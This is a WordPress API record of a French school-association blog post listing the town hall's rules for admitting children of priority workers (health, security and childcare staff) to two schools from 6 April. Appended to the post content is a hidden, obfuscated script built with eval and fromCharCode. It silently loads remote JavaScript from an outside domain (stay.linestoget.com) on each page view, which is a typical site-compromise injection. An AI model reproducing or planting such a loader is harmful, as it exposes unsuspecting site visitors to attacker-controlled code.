{"id":7881,"date":"2021-04-02T14:09:44","date_gmt":"2021-04-02T12:09:44","guid":{"rendered":"http:\/\/actifeducation.fr\/?p=7881"},"modified":"2021-04-02T16:08:29","modified_gmt":"2021-04-02T14:08:29","slug":"modalites-dorganisation-de-laccueil-des-enfants-prioritaires","status":"publish","type":"post","link":"http:\/\/actifeducation.fr\/?p=7881","title":{"rendered":"Modalit\u00e9s d&rsquo;organisation de l&rsquo;accueil des enfants prioritaires"},"content":{"rendered":"\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<figure class=\"wp-block-image size-large is-style-rounded\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"550\" src=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/04\/doctor-3410941_960_720.jpg\" alt=\"\" class=\"wp-image-7883\" srcset=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/04\/doctor-3410941_960_720.jpg 960w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/04\/doctor-3410941_960_720-300x172.jpg 300w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/04\/doctor-3410941_960_720-768x440.jpg 768w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/04\/doctor-3410941_960_720-220x126.jpg 220w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n<\/div>\n<\/div>\n\n\n\n<p>Voici les modalit\u00e9s d\u2019accueil des enfants dits \u201cprioritaires\u201d qui nous ont \u00e9t\u00e9 transmises par la mairie \u00e0 compter du mardi 6\u00a0avril:<\/p>\n\n\n\n<p id=\"block-b212f564-6790-44b2-95fc-77c169f65a97\">les 2 parents devront attester de travailler dans les professions prioritaires suivantes :<\/p>\n\n\n\n<p id=\"block-9873d89a-acb8-48f6-8179-d0a84bf9bf6e\">         \u2022 professionnels de sant\u00e9 et autour de la\u00a0sant\u00e9 (ASE, secr\u00e9taire m\u00e9dicale, biologiste&#8230;);<\/p>\n\n\n\n<p id=\"block-32569573-a0ea-4677-a828-8b320098f69f\">         \u2022 Force de s\u00e9curit\u00e9 (police nationale, gendarmerie, personnel p\u00e9nitencier &#8230;);<\/p>\n\n\n\n<p id=\"block-9958c161-1ae4-4bb7-9de8-f02d8ab76d88\">         \u2022 Accueil des enfants (enseignants, ATSEM, assistante maternelle, &#8230;).<\/p>\n\n\n\n<p id=\"block-8546503f-5952-4366-9cc6-4f752a155a74\">Les enfants seront accueillis \u00e0 l&rsquo;\u00e9cole les Blancs Bouleaux pour les maternelles et \u00e0 l&rsquo;\u00e9cole Emile Roux pour les \u00e9l\u00e9mentaires.<\/p>\n\n\n\n<p id=\"block-816797bc-2af2-4735-9902-b66d6a57fefd\">La restauration scolaire continue d&rsquo;\u00eatre assur\u00e9e\u00a0 (repas chaud servi dans les r\u00e9fectoires).<\/p>\n<script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script>","protected":false},"excerpt":{"rendered":"<p>Voici les modalit\u00e9s d\u2019accueil des enfants dits \u201cprioritaires\u201d qui nous ont \u00e9t\u00e9 transmises par la mairie \u00e0 compter du mardi 6\u00a0avril: les 2 parents devront attester de travailler dans les professions prioritaires suivantes : \u2022 professionnels de sant\u00e9 et autour de la\u00a0sant\u00e9 (ASE, secr\u00e9taire m\u00e9dicale, biologiste&#8230;); \u2022 Force de s\u00e9curit\u00e9 (police nationale, gendarmerie, personnel p\u00e9nitencier &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"http:\/\/actifeducation.fr\/?p=7881\"> <span class=\"screen-reader-text\">Modalit\u00e9s d&rsquo;organisation de l&rsquo;accueil des enfants prioritaires<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":7883,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-7881","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7881","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7881"}],"version-history":[{"count":3,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7881\/revisions"}],"predecessor-version":[{"id":7886,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/posts\/7881\/revisions\/7886"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/media\/7883"}],"wp:attachment":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7881"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7881"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7881"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}